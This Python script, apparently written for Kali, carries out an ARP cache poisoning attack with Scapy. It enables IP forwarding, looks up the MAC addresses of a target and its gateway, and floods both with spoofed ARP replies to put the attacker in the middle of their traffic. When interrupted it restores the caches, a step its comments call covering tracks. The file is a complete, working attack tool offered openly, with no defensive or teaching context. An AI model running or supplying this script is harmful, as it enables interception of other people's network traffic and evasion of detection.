attack_arp_poisoning.py

from scapy.all import *

# Enable IP Routing on Kali
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")

# User Inputs Target's IP
target_addr = raw_input("\nEnter the target's IP address: ") # Use 'input' for Windows

# User Inputs Gateway Address
gateway_addr = raw_input("\nEnter the target's Gateway IP address: ") # Use 'input' for Windows

# Function to Get Target's Hardware Address
def getMac(target_ip):
	arp_packet = Ether(dst = "ff:ff:ff:ff:ff:ff") / ARP(op = 1, pdst = target_ip)
	target_mac = srp(arp_packet, timeout=2 , verbose= False)[0][0][1].hwsrc
	return target_mac

# Function to Poison Target's ARP Cache
def arpPoison(target_ip, target_mac, gateway_ip):
	spoofed_message = ARP(op = 2 , pdst = target_ip, psrc = gateway_ip, hwdst = target_mac) # ARP Packet Creation
	send(spoofed_message, verbose= False)

# Function to Cover Tracks by Restoring Target's ARP Cache
def restoreArp(target_ip, target_mac, gateway_ip, gateway_mac):
	og_packet = ARP(op = 2 , hwsrc = gateway_mac , psrc = gateway_ip, hwdst = target_mac , pdst = target_ip) # ARP Packet Creation
	send(og_packet, verbose=False)
	print("ARP Cache Restored to Normal for %s" % target_ip)

# Execution
def main():
	print("\nRetrieving Information...")
	try:
		target_mac = getMac(target_addr)
		print("Target's MAC = %s" % target_mac)
	except:
		print("Target Did Not Respond to ARP Broadcast, Exiting...\n")
		quit()
	try:
		gateway_mac = getMac(gateway_addr)
		print("Gateway's MAC = %s" % gateway_mac)
	except:
		print("Gateway is Unreachable, Exiting...\n")
		quit()
	try:
		print("\nBeginning ARP Poisoning Attack...")
		while True:
			arpPoison(target_addr, target_mac, gateway_addr)
			arpPoison(gateway_addr, gateway_mac, target_addr)
	except KeyboardInterrupt:
		print("User Interruption...")
		restoreArp(gateway_addr, gateway_mac, target_addr, target_mac)
		restoreArp(target_addr, target_mac, gateway_addr, gateway_mac)
		print("ARP Poisoning Stopped\n")
		quit()
main()